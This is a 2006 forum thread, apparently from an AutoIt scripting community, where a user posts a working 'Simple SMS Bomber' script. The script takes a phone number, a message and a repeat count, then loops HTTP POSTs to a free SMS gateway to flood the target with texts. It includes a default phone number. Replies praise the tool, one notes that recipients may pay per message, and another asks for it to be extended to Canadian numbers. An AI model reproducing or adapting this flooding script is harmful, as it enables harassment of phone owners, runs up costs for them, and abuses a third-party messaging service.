ConsultingJoe Posted October 8, 2006 Posted October 8, 2006 Include File: HTTP.au3 #include <HTTP.au3> $title = "Simple SMS Bomber" $number = InputBox( $title, "Enter the 10 digit phone number", "7088783992" ) If @error Or $number = "" Then Exit $msg = InputBox( $title, "Enter The Message to send", "HELLO THERE" ) If @error Or $msg = "" Then Exit $times = InputBox( $title, "Enter the number of times to send the message", 10 ) If @error Or $times = "" Then Exit $host = "www.skaarn.com" $page = "/#" $vars = "number=" & $number & "&message=" & $msg & "&provider=goaway&submit=Send+Message%21" $data = _HTTPEncodeString($vars) For $i = 1 To $times TrayTip( $title, $i & " Messages sent", 1 ) $socket = _HTTPConnect($host) $post = _HTTPPost($host, $page, $socket, $data) _HTTPClose($socket) Next Check out ConsultingJoe.com
cppman Posted October 9, 2006 Posted October 9, 2006 haha, cool. Nice job. Too bad it sends that, "Sent with.. 4 free" message along with it Still cool Miva OS Project
ConsultingJoe Posted October 9, 2006 Author Posted October 9, 2006 haha, cool. Nice job.Too bad it sends that, "Sent with.. 4 free" message along with it Still cool yeah but atleast there is no CAPTCHA Check out ConsultingJoe.com
Uten Posted October 9, 2006 Posted October 9, 2006 It's not free when the receiver is likely to pay for it The normal fee for recieving a text message may occur, depending on the service provider! (Usually no more than $0.30 cents per message!) Please keep your sig. small! Use the help file. Search the forum. Then ask unresolved questions :) Script plugin demo, Simple Trace udf, TrayMenuEx udf, IOChatter demo, freebasic multithreaded dll sample, PostMessage, Aspell, Code profiling
bobnorman Posted October 31, 2006 Posted October 31, 2006 awww this would have been awesome if it worked here. Is there anyway you can get this to work with a service that can send sms msgs to users in canada as well instead of this one which will only do users that are in the US? thanks!
ConsultingJoe Posted November 2, 2006 Author Posted November 2, 2006 awww this would have been awesome if it worked here. Is there anyway you can get this to work with a service that can send sms msgs to users in canada as well instead of this one which will only do users that are in the US?thanks!sorry not that I have seen, I think this service doesn't work right now anyways because this site pays for so many messages and they probably used all of them from us.if you find one let me know, I will see what I can do. Check out ConsultingJoe.com
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now